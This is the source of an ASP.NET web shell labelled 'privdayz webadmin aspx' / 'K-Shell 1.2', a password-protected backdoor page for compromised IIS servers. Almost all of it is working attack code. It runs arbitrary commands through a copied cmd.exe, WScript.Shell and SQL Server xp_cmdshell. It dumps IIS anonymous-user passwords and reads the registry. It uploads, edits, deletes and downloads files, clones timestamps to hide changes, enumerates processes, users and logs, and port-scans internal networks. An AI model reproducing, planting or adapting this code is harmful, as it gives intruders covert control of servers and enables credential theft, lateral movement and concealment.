<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%><%@ Import Namespace="System.IO" %><%@ import namespace="System.Diagnostics" %><%@ import namespace="System.Threading" %><%@ import namespace="System.Text" %><%@ import namespace="System.Security.Cryptography" %><%@ Import Namespace="System.Net.Sockets"%><%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %><%@ import Namespace="System.DirectoryServices" %><%@ import Namespace="Microsoft.Win32" %><script language="VB" runat="server">Dim PASSWORD as string = "e8ff7d8d7a49a969a2cb8502eded9d79" ' roootdim url,TEMP1,TEMP2,TITLE as stringFunction GetMD5(ByVal strToHash As String) As String Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider() Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash) bytesToHash = md5Obj.ComputeHash(bytesToHash) Dim strResult As String = "" Dim b As Byte For Each b In bytesToHash strResult += b.ToString("x2") Next Return strResultEnd FunctionSub Login_click(sender As Object, E As EventArgs) if GetMD5(Textbox.Text)=PASSWORD then session("rooot")=1 session.Timeout=60 else response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font>
") end ifEnd Sub'Run w32 shellDeclare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As LongDeclare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As LongSub RunCmdW32(Src As Object, E As EventArgs) dim command dim fileObject = Server.CreateObject("Scripting.FileSystemObject") dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( ) If Request.Form("txtCommand1") = "" Then command = "dir c:\" else command = Request.Form("txtCommand1") End If ExecuteCommand1(command,tempFile,txtCmdFile.Text) OutputTempFile1(tempFile,fileObject) 'txtCommand1.text=""End SubSub ExecuteCommand1(command As String, tempFile As String,cmdfile As String) Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name Dim FailIfExists local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\")) 'local_copy_of_cmd = Local_dir+"cmd.exe" 'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe" local_copy_of_cmd=cmdfile Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe" CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists) errReturn = WinExec(Target_copy_of_cmd + " /c " + command + " > " + tempFile , 10) response.write(errReturn) thread.sleep(500)End SubSub OutputTempFile1(tempFile,oFileSys) On Error Resume Next dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0) resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>" oFile.Close Call oFileSys.DeleteFile(tempFile, True) End sub'End w32 shell'Run WSH shellSub RunCmdWSH(Src As Object, E As EventArgs) dim command dim fileObject = Server.CreateObject("Scripting.FileSystemObject") dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( ) If Request.Form("txtcommand2") = "" Then command = "dir c:\" else command = Request.Form("txtcommand2") End If ExecuteCommand2(command,tempFile) OutputTempFile2(tempFile,fileObject) txtCommand2.text=""End SubFunction ExecuteCommand2(cmd_to_execute, tempFile) Dim oScript oScript = Server.CreateObject("WSCRIPT.SHELL") Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)End functionSub OutputTempFile2(tempFile,fileObject) On Error Resume Next dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0) resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>" oFile.Close Call fileObject.DeleteFile(tempFile, True)End sub'End WSH shell'System inforSub output_all_environment_variables(mode) Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if mode="HTML" then response.write(" " +de.Key + " : " + de.Value + "
") else if mode="text" response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline) end if end if NextEnd subSub output_all_Server_variables(mode) dim item for each item in request.servervariables if mode="HTML" then response.write("" + item + " : ") response.write(request.servervariables(item)) response.write("
") else if mode="text" response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline) end if end if nextEnd sub'End sysinforFunction Server_variables() As String dim item dim tmp As String tmp="" for each item in request.ServerVariables if request.servervariables(item) <> "" 'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline) tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r" end if next return tmpEnd function'Begin List processesFunction output_wmi_function_data(Wmi_Function,Fields_to_Show) dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain dim fields_split, fields_item,i 'on error resume next table("0","","") Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show) winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function) fields_split = split(Fields_to_Show,",") for each item in objProcessInfo tr Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value) if Ubound(Fields_split)>0 then for i = 1 to ubound(fields_split) Surround_by_TD(center_(item.properties_.item(fields_split(i)).value)) next end if _tr nextEnd functionFunction output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount) dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain dim fields_split, fields_item,i,count newline rw("Showing the first " + cstr(MaxCount) + " Entries") newline newline table("1","","") Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show) _table winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")' objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function) objProcessInfo = winObj.InstancesOf(Wmi_Function) fields_split = split(Fields_to_Show,",") count = 0 for each item in objProcessInfo count = Count + 1 table("1","","") tr Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value) if Ubound(Fields_split)>0 then for i = 1 to ubound(fields_split) Surround_by_TD(item.properties_.item(fields_split(i)).value) next end if _tr if count > MaxCount then exit for nextEnd function'End List processes'Begin IIS_list_Anon_Name_PassSub IIS_list_Anon_Name_Pass() Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") ' Create an instance of the IIsComputer object providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2") nodeObj = providerObj.InstancesOf("IIsWebVirtualDirSetting") ' - IISwebServerSetting Dim MaxCount = 20,Count = 0 hr RW("only showing the first "+cstr(MaxCount) + " items") hr for each item in nodeObj response.write("" + item.AppFriendlyName + " - ") response.write("(" + item.AppPoolId + ") ") response.write(item.AnonymousUserName + " : ") response.write(item.AnonymousUserPass) response.write("
") response.flush Count = Count +1 If Count > MaxCount then exit for next hrEnd sub 'End IIS_list_Anon_Name_PassPrivate Function CheckIsNumber(ByVal sSrc As String) As Boolean Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$") If reg.IsMatch(sSrc) Then Return True Else Return False End IfEnd FunctionPublic Function IISSpy() As String Dim iisinfo As String = "" Dim iisstart As String = "" Dim iisend As String = "" Dim iisstr As String = "IIS://localhost/W3SVC" Dim i As Integer = 0 Try Dim mydir As New DirectoryEntry(iisstr) iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>" For Each child As DirectoryEntry In mydir.Children If CheckIsNumber(child.Name.ToString()) Then Dim dirstr As String = child.Name.ToString() Dim tmpstr As String = "" Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr) Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir") i = i + 1 iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>" iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>" iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>" iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>" iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>" iisinfo += "</TR>" End If Next iisend = "</TABLE>" Catch ex As Exception Return ex.Message End Try Return iisstart + iisinfo + iisendEnd FunctionSub RegistryRead(Src As Object, E As EventArgs) Try Dim regkey As String = txtRegKey.Text Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1) Dim rk As RegistryKey = Nothing Dim buffer As Object Dim regstr As String = "" If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then rk = Registry.LocalMachine.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then rk = Registry.ClassesRoot.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then rk = Registry.CurrentUser.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then rk = Registry.Users.OpenSubKey(subkey) End If If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then rk = Registry.CurrentConfig.OpenSubKey(subkey) End If buffer = rk.GetValue(txtRegValue.Text, "NULL") dim tmpbyte As Byte = 0 lblresultReg.Text = "
Result : " + buffer.ToString() Catch ex As Exception Response.write(ex.Message) End TryEnd Sub' Begin List Web Site Home Directory Properties' End List Web Site Home Directory PropertiesSub RunCMD(Src As Object, E As EventArgs) Try Dim kProcess As New Process() Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe") kProcessStartInfo.UseShellExecute = False kProcessStartInfo.RedirectStandardOutput = true kProcess.StartInfo = kProcessStartInfo kProcessStartInfo.Arguments="/c " & Cmd.text kProcess.Start() Dim myStreamReader As StreamReader = kProcess.StandardOutput Dim myString As String = myStreamReader.Readtoend() kProcess.Close() result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>" Cmd.text="" Catch result.text="This function has disabled!" End TryEnd SubSub CloneTime(Src As Object, E As EventArgs) existdir(time1.Text) existdir(time2.Text) Dim thisfile As FileInfo =New FileInfo(time1.Text) Dim thatfile As FileInfo =New FileInfo(time2.Text) thisfile.LastWriteTime = thatfile.LastWriteTime thisfile.LastAccessTime = thatfile.LastAccessTime thisfile.CreationTime = thatfile.CreationTime response.Write("<font color=""red"">Clone Time Success!</font>")End Subsub Editor(Src As Object, E As EventArgs) dim mywrite as new streamwriter(filepath.text,false,encoding.default) mywrite.write(content.text) mywrite.close response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")end subSub UpLoad(Src As Object, E As EventArgs) dim filename,loadpath as string filename=path.getfilename(UpFile.value) loadpath=request.QueryString("src") & filename if file.exists(loadpath)=true then response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>") response.End() end if UpFile.postedfile.saveas(loadpath) response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');") response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")End SubSub NewFD(Src As Object, E As EventArgs) url=request.form("src") if NewFile.Checked = True then dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default) mywrite.close response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text)) else directory.createdirectory(url & NewName.Text) response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>") end ifEnd SubSub del(a) if right(a,1)="\" then dim xdir as directoryinfo dim mydir as new DirectoryInfo(a) dim xfile as fileinfo for each xfile in mydir.getfiles() file.delete(a & xfile.name) next for each xdir in mydir.getdirectories() call del(a & xdir.name & "\") next directory.delete(a) else file.delete(a) end ifEnd SubSub copydir(a,b) dim xdir as directoryinfo dim mydir as new DirectoryInfo(a) dim xfile as fileinfo for each xfile in mydir.getfiles() file.copy(a & "\" & xfile.name,b & xfile.name) next for each xdir in mydir.getdirectories() directory.createdirectory(b & path.getfilename(a & xdir.name)) call copydir(a & xdir.name & "\",b & xdir.name & "\") nextEnd SubSub xexistdir(temp,ow) if directory.exists(temp)=true or file.exists(temp)=true then if ow=0 then response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url)) elseif ow=1 then del(temp) else dim d as string = session("cutboard") if right(d,1)="\" then TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) else TEMP2=url & second(now) & replace(path.getfilename(d),"","") end if end if end ifEnd SubSub existdir(temp) if file.exists(temp)=false and directory.exists(temp)=false then response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\") &" ! Is it a CD-ROM ?');</sc" & "ript>") response.Write("
<a href='javascript:history.back(1);'>Click Here Back</a>") response.End() end ifEnd SubSub RunSQLCMD(Src As Object, E As EventArgs) Dim adoConn,strQuery,recResult,strResult if SqlName.Text<>"" then adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text) If Sqlcmd.Text<>"" Then strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'" recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0).value recResult.MoveNext Loop End if recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>" SqlCMD.Text="" End if adoConn.Close End if End SubSub RunSQLQUERY(Src As Object, E As EventArgs) Dim adoConn,strQuery,recResult,strResult if txtSqlName.Text<>"" then adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text) If txtSqlcmd.Text<>"" Then strQuery = txtSqlcmd.Text recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0).value recResult.MoveNext Loop End if recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>" txtSqlCMD.Text="" End if adoConn.Close End if End SubFunction GetStartedTime(ms) GetStartedTime=cint(ms/(1000*60*60))End functionFunction getIP() Dim strIPAddr as string If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then strIPAddr = Request.ServerVariables("REMOTE_ADDR") ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1) ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1) Else strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR") End If getIP = Trim(Mid(strIPAddr, 1, 30))End FunctionFunction Getparentdir(nowdir) dim temp,k as integer temp=1 k=0 if len(nowdir)>4 then nowdir=left(nowdir,len(nowdir)-1) end if do while temp<>0 k=temp+1 temp=instr(temp,nowdir,"\") if temp =0 then exit do end if temp = temp+1 loop if k<>2 then getparentdir=mid(nowdir,1,k-2) else getparentdir=nowdir end ifEnd functionFunction Rename() url=request.QueryString("src") if file.exists(Getparentdir(url) & request.Form("name")) then rename=0 else file.copy(url,Getparentdir(url) & request.Form("name")) del(url) rename=1 end ifEnd Function Function GetSize(temp) if temp < 1024 then GetSize=temp & " bytes" else if temp\1024 < 1024 then GetSize=temp\1024 & " KB" else if temp\1024\1024 < 1024 then GetSize=temp\1024\1024 & " MB" else GetSize=temp\1024\1024\1024 & " GB" end if end if end ifEnd Function Sub downTheFile(thePath) dim stream stream=server.createObject("adodb.stream") stream.open stream.type=1 stream.loadFromFile(thePath) response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," ")) response.addHeader("Content-Length",stream.Size) response.charset="UTF-8" response.contentType="application/octet-stream" response.binaryWrite(stream.read) response.flush stream.close stream=nothing response.End()End Sub'H T M L S N I P P E T Spublic sub Newline response.write("<BR>") end sub public sub TextNewline response.write(vbnewline) end sub public sub rw(text_to_print) ' Response.write response.write(text_to_print) end sub public sub rw_b(text_to_print) rw(""+text_to_print+"") end sub public sub hr() rw("<hr>") end sub public sub ul() rw("<ul>") end sub public sub _ul() rw("</ul>") end sub public sub table(border_size,width,height) rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>") end sub public sub _table() rw("") end sub public sub tr() rw("
") end sub public sub _tr() rw("
") end sub public sub td() rw("") end sub public sub _td() rw(" | ") end sub public sub td_span(align,name,contents) rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span>") end sub Public sub td_link(align,title,link,target) rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a>") end sub Public sub link(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") end sub Public sub link_hr(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") hr end sub Public sub link_newline(title,link,target) rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>") newline end sub public sub empty_Cell(ColSpan) rw("<td colspan='"+cstr(colspan)+"'>") end sub public sub empty_row(ColSpan) rw("<td colspan='"+cstr(colspan)+"'>
") end sub Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems) dim rowItem rowItems = split(rowItems,",") response.write("<tr bgcolor="+bgcolor+">") for each rowItem in RowItems response.write("<td align="+alignValue+"><font color="+fontColor+">"+rowItem +"</font>") next response.write("") end sub Public sub TR_TD(cellContents) response.write("") response.write(cellContents) response.write(" | ") end sub Public sub Surround_by_TD(cellContents) response.write("") response.write(cellContents) response.write(" | ") end sub Public sub Surround_by_TD_and_Bold(cellContents) response.write("") response.write(cellContents) response.write(" | ") end sub Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents) response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+">") response.write(cellContents) response.write("</font>") end sub Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index) response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>") response.write(" <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>") response.write(" <tr heigth=20>") response.write(" <td bgcolor='black' align=center><font color='white'>"+ title +"</font>") response.write(" ") response.write(" ") response.write(" "+main_Cell_contents+" | ") response.write("
") response.write(" ") response.write("</div>") end sub Public sub Create_Div_open(top,left,width,height,z_index) response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>") end sub Public sub Create_Div_close() response.write("</div>") end sub public sub Create_Iframe(left, top, width, height, name,src) rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>") rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>") rw("</span>") end sub public sub Create_Iframe_relative(width, height, name,src) rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>") end sub public sub return_100_percent_table() rw("<table border width='100%' height='100%'>sdf |
") end sub public sub font_size(size) rw("<font size="+size+">") end sub public sub end_font() rw("</font>") end sub public sub red(contents) rw("<font color=red>"+contents+"</font>") end sub public sub yellow(contents) rw("<font color='#FF8800'>"+contents+"</font>") end sub public sub green(contents) rw("<font color=green>"+contents+"</font>") end sub public sub print_var(var_name, var_value,var_description) if var_description<> "" Then rw(b_(var_name)+" : " + var_value + i_(" ("+var_description+")")) else rw(b_(var_name)+" : " + var_value) end if newline end sub' Functions public function br_() br_ = "
" end function public function b_(contents) b_ = ""+ contents + "" end function public function i_(contents) i_ = "<i>"+ contents + "</i>" end function public function li_(contents) li_ = "<li>"+ contents + "</li>" end function public function h1_(contents) h1_ = ""+ contents + "
" end function public function h2_(contents) h2_ = ""+ contents + "
" end function public function h3_(contents) h3_ = ""+ contents + "
" end function public function big_(contents) big_ = "<big>"+ contents + "</big>" end function public function center_(contents) center_ = ""+ cstr(contents) + "" end function public function td_force_width_(width) td_force_width_ = "
<img src='' height=0 width=" + cstr(width) + " border=0>" end function public function red_(contents) red_ = "<font color=red>"+contents+"</font>" end function public function yellow_(contents) yellow_ = "<font color='#FF8800'>"+contents+"</font>" end function public function green_(contents) green_ = "<font color=green>"+contents+"</font>" end function Public function link_(title,link,target) link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>" end function'End HTML SNIPPETS 'Begin ScannerPublic Class ScannerPublic Ips As New ArrayList()Public ports As New ArrayList()Public succMsg As New StringBuilder()Public ret As ListBoxPublic errMsg As String = ""Public Timeout As Integer = 3000Public Sub start()Dim thread As New Thread(New ThreadStart(AddressOf Me.run))thread.Start()thread = NothingEnd SubPublic Sub run()ret.Items.Clear()For Each ip As String In IpsFor Each port As String In ports'ret.Items.Add(ip + ":" + port);Dim scanres As String = ""TryDim tcpClient As New TcpClient()Try tcpClient.Connect(ip, Int32.Parse(port)) tcpClient.Close() ret.Items.Add(ip + " : " + port + " ................................. Open") Catch e As SocketException ret.Items.Add(ip + " : " + port + " ................................. Close")End TrytcpClient.Close()Catch exp As SocketExceptionerrMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.MessageEnd TryNextNextEnd SubEnd ClassPublic Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayListDim IpList As New ArrayList()Dim IpParts1 As String() = New String(3) {}Dim IpParts2 As String() = New String(3) {}IpParts1 = StartIp.Split("."C)IpParts2 = EndIP.Split("."C)Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1If nTime < 0 ThenResponse.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "")Return NothingEnd IfFor n As Integer = 0 To nTime - 1IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3))Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1IpParts1(3) = tmp.ToString()If IpParts1(3).Equals("255") Thentmp = Int32.Parse(IpParts1(2)) + 1IpParts1(2) = tmp.ToString()IpParts1(3) = "1"End IfIf IpParts1(2).Equals("255") Thentmp = Int32.Parse(IpParts1(1)) + 1IpParts1(1) = tmp.ToString()IpParts1(2) = "1"End IfIf IpParts1(1).Equals("255") Thentmp = Int32.Parse(IpParts1(0)) + 1IpParts1(0) = tmp.ToString()IpParts1(1) = "1"End IfNextReturn IpListEnd FunctionProtected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs)If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" ThenResponse.Write("IP OR Ports Error.Check")ReturnEnd IfDim StartIp As String = txtStartIP.TextDim EndIp As String = txtEndIP.TextDim ips As ArrayList = MakeIps(StartIp, EndIp)Dim ScanPorts As New ArrayList()Dim ports As String() = txtPorts.Text.Split(","C)For Each port As String In ports'Response.Write(port);ScanPorts.Add(port)NextlstRet.Visible = TrueLabel1.Visible = TrueDim myscanner As New Scanner()myscanner.Ips = ipsmyscanner.ports = ScanPortsmyscanner.ret = Me.lstRetmyscanner.run()End SubProtected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs)txtStartIP.Text = ""txtEndIP.Text = ""txtPorts.Text = ""Label1.Visible = FalselstRet.Visible = FalseEnd Sub'End Scanner</script><%if request.QueryString("action")="down" and session("rooot")=1 then downTheFile(request.QueryString("src")) response.End()end ifDim act as string = request.QueryString("action")if act="cmd" then TITLE="CMD.NET"elseif act="cmdw32" then TITLE="ASP.NET W32 Shell"elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell"elseif act="sqlrootkit" then TITLE="SqlRootKit.NET"elseif act="clonetime" then TITLE="Clone Time"elseif act="information" then TITLE="Web Server Info"elseif act="goto" then TITLE="K-Shell 1.2"elseif act="pro1" then TITLE="List processes from server"elseif act="pro2" then TITLE="List processes from server"elseif act="user" then TITLE="List User Accounts"elseif act="applog" then TITLE="List Application Event Log Entries"elseif act="syslog" then TITLE="List System Event Log Entries"elseif act="auser" then TITLE="IIS List Anonymous' User details"elseif act="sqlman" then TITLE="MSSQL Management"elseif act="scan" then TITLE="Port Scanner"elseif act="iisspy" then TITLE="IIS Spy"elseif act="sqltool" then TITLE="SQL Tool"elseif act="regshell" then TITLE="Registry Shell"else TITLE=request.ServerVariables("HTTP_HOST") end if%><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><style>body{background-color:#444;color:#e1e1e1;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333; }a{ text-decoration:none; }a:hover{ text-decoration:underline; }.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }.bigarea{ width:100%;height:300px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }.toolsInp{ width: 300px }.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style><meta http-equiv="Content-Type" content="text/html">privdayz webadmin aspx<title>privdayz webadmin aspx</title><hr><%else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "<font color=white>Server IP :</font> " + Request.ServerVariables("LOCAL_ADDR") + " - <font color=white>Client IP :</font> " + getIP() + " - " dim HostName As string = "<font color=white>HostName :</font> " + Environment.MachineName + " - <font color=white>Username :</font> "+ Environment.UserName +"
" dim OSVersion As string = "<font color=white>OS Version :</font> " + Environment.OSVersion.ToString() + "" dim IISversion As string = "<font color=white> - IIS Version :</font> " + Request.ServerVariables("SERVER_SOFTWARE") + "
<font color=white>System Dir :</font> " + Environment.SystemDirectory + "" dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "<font color=white>Hardware Info :</font> " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO%><table width="100%" border="0" align="center"> <asp:Label ID="Info" runat="server" EnableViewState="False" /> |
<hr><table width="100%" border="0" align="center"> Currently Dir: | <font color=red><%=url%></font> |
<td width="10%">Operate: <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> - <%if session("cutboard")<>"" then%> <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> - <%else%> Paste - <%end if%><a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a>
